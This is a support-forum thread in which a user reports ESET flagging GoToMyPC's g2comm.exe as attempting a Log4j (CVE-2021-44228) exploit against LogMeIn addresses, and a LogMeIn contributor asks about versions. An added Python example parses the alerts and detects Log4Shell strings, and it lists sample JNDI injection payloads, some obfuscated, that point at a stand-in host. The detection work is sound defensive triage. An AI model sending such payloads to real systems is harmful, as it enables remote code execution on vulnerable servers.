J.1
Contributor

ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

I got a report from my system's ESET endpoint security software today:

 

NEW NOTIFICATION

Firewall event detected and blocked by Eset

An Event Log notification has occurred with the following parameters:

Category: Firewall detection
Monitored static group: All
Attempt was made to reach 67.217.69.93 on port 80 by a machine at (internal address) and blocked
1 per minute were noticed
Firewall detection . Event is one of {Security vulnerability exploitation}

 

The official detection was cited as JAVA/Exploit.CVE-2021-44228 . The destination given up there is an IP address in LogMeIn's block. The program ESET claims made this exploitation attempt is C:\Program Files (x86)\GoToMyPC\g2comm.exe. Prior to this, one of our other security/IPS systems claimed that other machines also attempted Log4j exploitations against several IP addresses. All of the target IPs were LogMeIn addresses. Is there something in the Gotomypc agent that causes security systems to believe that a log4j attack is being made?

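An added example for triaging events like the ones quoted above (this is not ESET's or LogMeIn's code and is not part of the original post). It parses the notification text into one record per event and groups the records by process and detection name, so repeated hits against different destinations stand out; separately, it shows the kind of pattern a JAVA/Exploit.CVE-2021-44228 network signature keys on, a Log4j `${jndi:...}` lookup, including the nested-lookup obfuscations (`${lower:j}`, `${::-j}`, `${env:X:-j}`) that Log4j resolves before the JNDI lookup runs. The `Process:` and `Detection:` lines in the sample, the internal addresses, and all payload strings are constructed for the example; the thread never shows what the blocked port-80 traffic actually contained, so the payload check is what you would run over a packet capture of g2comm.exe's traffic to confirm or rule out the detection, not a statement about what that traffic is.

```python
"""Triage helpers for ESET 'Security vulnerability exploitation' firewall events.

Added example for this thread, not ESET or LogMeIn code. The event text is
modelled on the notifications quoted above; the 'Process:' and 'Detection:'
lines are a constructed convenience so one record carries what the poster read
from two places in ESET PROTECT. Internal addresses are placeholders.
"""
import re
from collections import defaultdict

# Constructed sample: the three destinations from the thread, placeholder sources.
SAMPLE_EVENTS = r"""Category: Firewall detection
Attempt was made to reach 67.217.69.93 on port 80 by a machine at 10.0.0.21 and blocked
Process: C:\Program Files (x86)\GoToMyPC\g2comm.exe
Detection: JAVA/Exploit.CVE-2021-44228
---
Category: Firewall detection
Attempt was made to reach 216.115.214.177 on port 80 by a machine at 10.0.0.37 and blocked
Process: C:\Program Files (x86)\GoToMyPC\g2comm.exe
Detection: JAVA/Exploit.CVE-2021-44228
---
Category: Firewall detection
Attempt was made to reach 68.64.26.45 on port 80 by a machine at 10.0.0.21 and blocked
Process: C:\Program Files (x86)\GoToMyPC\g2comm.exe
Detection: JAVA/Exploit.CVE-2021-44228
"""

EVENT_RE = re.compile(
    r"Attempt was made to reach (?P<dst>\d{1,3}(?:\.\d{1,3}){3}) on port (?P<port>\d+) "
    r"by a machine at (?P<src>\S+) and blocked"
)
FIELD_RE = re.compile(r"^(Process|Detection): (.+)$", re.M)


def parse_events(text):
    """Split a notification dump on '---' and return one dict per event."""
    events = []
    for block in text.split("---"):
        m = EVENT_RE.search(block)
        if not m:
            continue
        ev = dict(m.groupdict())
        ev["port"] = int(ev["port"])
        ev.update({k.lower(): v for k, v in FIELD_RE.findall(block)})
        events.append(ev)
    return events


def summarize(events):
    """Group by (process, detection): destinations, ports and source hosts seen."""
    summary = defaultdict(lambda: {"destinations": set(), "ports": set(), "sources": set()})
    for ev in events:
        key = (ev.get("process", "?"), ev.get("detection", "?"))
        summary[key]["destinations"].add(ev["dst"])
        summary[key]["ports"].add(ev["port"])
        summary[key]["sources"].add(ev["src"])
    return {k: {f: sorted(v) for f, v in d.items()} for k, d in summary.items()}


# What a CVE-2021-44228 signature keys on: a Log4j JNDI lookup, possibly hidden
# behind inner lookups that Log4j resolves first. We resolve those the same way.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.I)
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper)\s*:\s*([^${}])\}", re.I)  # ${lower:j} -> j
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")                   # ${env:X:-j} -> j


def normalize_lookups(s, max_rounds=10):
    """Collapse innermost obfuscation lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = CASE_LOOKUP.sub(lambda m: m.group(1), s)
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def looks_like_log4shell(payload):
    """True if the payload contains a (possibly obfuscated) ${jndi:...} lookup."""
    return JNDI_RE.search(normalize_lookups(payload)) is not None


if __name__ == "__main__":
    for key, agg in summarize(parse_events(SAMPLE_EVENTS)).items():
        print(key, agg)
    # Constructed payloads: one benign request, three lookup variants.
    for p in ["GET /poll?client=g2comm&ver=1 HTTP/1.1",
              "${jndi:ldap://198.51.100.7:1389/a}",
              "${${lower:j}ndi:${lower:r}mi://198.51.100.7/x}",
              "${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.7/x}"]:
        print(looks_like_log4shell(p), p)
```

Run against a real capture, feed `looks_like_log4shell` each HTTP request line, header and body the agent sent to the flagged address; a hit means the signature fired on real content, no hit across the whole session points at a signature keying on something other than the payload (for example the port or a request shape), which is what to take back to the vendor.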
AshC
LogMeIn Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

Thanks @J.1 

We will try to investigate this further and let the Community know our findings.

J.1
Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

It happened again over the weekend.

 

NEW NOTIFICATION

Firewall event detected and blocked by Eset

An Event Log notification has occurred with the following parameters:

Category: Firewall detection
Monitored static group: All
Attempt was made to reach 216.115.214.177 on port 80 by a machine at (different internal address than last time) and blocked
1 per minute were noticed
Firewall detection . Event is one of {Security vulnerability exploitation}

 

216.115.214.177 is a Logmein/Goto address. According to our ESET records, the process making this attempt was once again C:\Program Files (x86)\GoToMyPC\g2comm.exe and the specific exploitation was JAVA/Exploit.CVE-2021-44228.

J.1
Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

Firewall event detected and blocked by Eset

An Event Log notification has occurred with the following parameters:

Category: Firewall detection
Monitored static group: All
Attempt was made to reach 68.64.26.45 on port 80 by a machine at (internal address) and blocked
1 per minute were noticed
Firewall detection . Event is one of {Security vulnerability exploitation}

 

Once again, the target is a LogMeIn IP, and ESET says the detection is JAVA/Exploit.CVE-2021-44228, with the guilty process being C:\Program Files (x86)\GoToMyPC\g2comm.exe.

J.1
Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

Happened again, several seconds ago. Please let us know why Gotomypc appears to be triggering Log4j detectors even though it's supposed to no longer use that code. Thank you.

AshC
LogMeIn Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

@J.1 Can you tell us what ESET product / version you're using there?

J.1
Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

ESET Endpoint Security version 9.0.2032.6.

ESET PROTECT (Server), Version 9.0 (9.0.1141.0)
ESET PROTECT (Web Console), Version 9.0 (9.0.138.0)

AshC
LogMeIn Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

@J.1 Thanks, we continue to investigate.

J.1
Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

Has there been any kind of progress in figuring this one out?

 

Thank you.